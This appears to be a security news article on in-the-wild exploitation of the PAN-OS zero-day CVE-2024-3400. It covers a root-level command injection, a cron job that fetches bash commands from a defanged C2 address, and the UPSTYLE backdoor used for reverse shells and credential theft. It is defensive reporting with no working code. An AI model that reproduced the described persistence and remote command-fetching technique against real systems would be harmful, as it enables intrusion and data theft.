A significant cyber threat has emerged, characterized by the exploitation of a recently uncovered zero-day vulnerability in Palo Alto Networks PAN-OS software. This flaw has been active since March 26, 2024, well before its public disclosure, which occurred yesterday.
Unit 42, a division of Palo Alto Networks, has initiated a tracking operation dubbed Operation MidnightEclipse. This operation is believed to have been carried out by a single threat actor whose origins remain unknown.
The vulnerability, identified as CVE-2024-3400 and assigned a critical CVSS score of 10.0, manifests as a command injection flaw. It allows unauthenticated attackers to execute arbitrary code with root privileges on affected firewall configurations, specifically those using PAN-OS 10.2, 11.0, or 11.1 with GlobalProtect gateway and device telemetry enabled.
The tactics employed in Operation MidnightEclipse include the exploitation of this vulnerability to establish a cron job that executes every minute, fetching commands from an external server (“172.233.228[.]93/policy” or “172.233.228[.]93/patch”) for execution via the bash shell.
Reports indicate that the attackers have implemented a meticulous control scheme to manage an access control list (ACL) for the command-and-control (C2) server, restricting access solely to the device interacting with it. The exact content of the executed commands, however, remains speculative.
Further investigation by Volexity has revealed in-the-wild exploitation of CVE-2024-3400 beginning April 10, 2024. They attribute the suspicious URL to a Python-based backdoor named UPSTYLE. This backdoor is believed to be hosted on different servers and is capable of downloading additional malicious tools that enable the threat actor to create a reverse shell and pivot within internal networks, ultimately leading to data exfiltration.
Noteworthy is the method by which the system executes commands and logs outputs. The actor manipulates legitimate files associated with the firewall, redirecting their functionalities to carry out their tasks while covering their tracks. The results of these command executions are stored temporarily in files associated with the firewall’s operational logs before being overwritten within a strict timeframe, indicating a sophisticated approach to preserving stealth.
Volexity has classified the attacking entity as UTA0218, suggesting a potential state-sponsored origin. Their objectives appear to include targeting critical data, such as domain backup DPAPI keys and Active Directory credentials, while also seeking to extract sensitive information from users’ workstations.
Businesses are advised to scrutinize any signs of lateral movement stemming from their Palo Alto Networks GlobalProtect firewall devices, as well as monitor for unauthorized access or changes within their internal networks. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities catalog, mandating that federal agencies apply the relevant patches promptly, which are expected from Palo Alto Networks by April 14.
The incident serves as a stark reminder that edge devices remain prime targets for advanced threat actors, pointing to the necessity for organizations to bolster their cybersecurity measures and stay vigilant against sophisticated attack techniques outlined in the MITRE ATT&CK framework, particularly in relation to initial access, persistence, and privilege escalation tactics.
